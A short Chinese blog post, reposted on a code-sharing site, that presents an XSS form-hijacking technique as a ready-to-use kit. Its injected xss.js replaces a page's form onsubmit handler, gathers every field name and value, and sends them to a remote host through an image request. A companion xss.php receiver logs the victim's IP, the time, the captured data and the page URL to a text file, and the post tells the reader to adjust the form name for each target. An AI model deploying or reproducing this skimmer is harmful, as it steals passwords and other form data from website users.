码迷,mamicode.com
首页 > 其他好文 > 详细

xss 表单劫持(from通用明文记录)

时间:2017-04-11 01:38:14      阅读:257      评论:0      收藏:0      [点我收藏+]

标签:xss表单劫持   明文记录   

大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.


xss.js:

var f=document.forms[‘from1‘];
if(f==undefined)
{
        f=document.getElementById(‘‘);
}
var func=f.onsubmit;
f.onsubmit=function(event)
{
	var str=‘‘;
	for(var i=0;i<f.elements.length;i++)
	{
		str+=f.elements[i].name+‘:‘+f.elements[i].value+‘||‘;
	}
	str=str.substr(0,str.length-2);
	var img=new Image();
	img.src=‘http://blog.51cto.com/xss.php?data=‘+escape(str)+‘&url=‘+escape(location.href);
	func(event);
	return true;
}

技术分享


根据各程序不同,修改表单名称

var f=document.forms[‘form1‘];



接收端xss.php

<?php
$ip = $_SERVER[‘REMOTE_ADDR‘];
$cookie = $_GET[‘data‘];
$url = $_GET[‘url‘];
$time = gmdate("H:i:s",time()+8*3600);
$file = "jzking121.txt" ;
$fp=fopen ("jzking121.txt","a")  ;
$txt= "$ip"."----"."$time"."----"."$cookie"."----"."$url"."\n";
fputs($fp,$txt);
?>



参考:

http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/

本文出自 “jzking121' blog” 博客,请务必保留此出处http://jzking121.blog.51cto.com/5436671/1914721

xss 表单劫持(from通用明文记录)

标签:xss表单劫持   明文记录   

原文地址:http://jzking121.blog.51cto.com/5436671/1914721

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!